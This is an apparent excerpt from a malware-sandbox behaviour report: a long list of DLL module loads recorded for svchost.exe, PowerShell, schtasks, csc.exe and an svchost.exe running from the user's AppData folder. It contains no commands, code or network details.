              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winmm.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: urlmon.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wininet.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iertutil.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: srvcli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: netutils.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
